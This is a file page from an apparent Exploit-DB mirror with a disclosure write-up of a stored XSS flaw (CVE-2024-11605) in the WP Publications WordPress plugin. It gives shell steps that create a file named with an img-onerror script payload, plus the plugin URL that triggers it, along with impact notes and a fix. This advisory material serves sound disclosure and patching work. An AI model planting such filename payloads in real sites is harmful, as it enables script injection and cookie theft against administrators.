bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52368.txt
Exploit-DB 08e51ef2f9 DB: 2025-07-17 
12 changes to exploits/shellcodes/ghdb

TOTOLINK N300RB 8.54 - Command Execution

MikroTik RouterOS 7.19.1 - Reflected XSS

Langflow 1.2.x - Remote Code Execution (RCE)

PivotX 3.0.0 RC3 - Remote Code Execution (RCE)

SugarCRM 14.0.0 - SSRF/Code Injection

White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)

WP Publications WordPress Plugin 1.2 - Stored XSS

NodeJS 24.x - Path Traversal

Keras 2.15 - Remote Code Execution (RCE)

Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege

Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges

Microsoft Outlook - Remote Code Execution (RCE)
2025-07-17 00:16:33 +00:00

60 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605
## Vulnerability Details
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
---
## Proof of Concept (PoC)
1. SSH into the server and navigate to the plugin directory:
```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```
2. Run the following command to create a malicious BibTeX file:
```bash
touch "<img src=x onerror=alert('XSS')>.bib"
```
3. Access the plugin's BibTeX browser via the following URL:
```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```
4. The injected JavaScript will be executed, triggering the XSS payload:
```javascript
alert('XSS');
```
---
## Impact
* Stored XSS (JavaScript) is executed in the context of the admin panel.
* Bypasses `unfiltered_html` protection in multisite environments.
* Can be used for privilege escalation, cookie theft, or injecting malicious content.
---
## Recommendation
Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
---
## References
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)
Reference in a new issue View git blame Copy permalink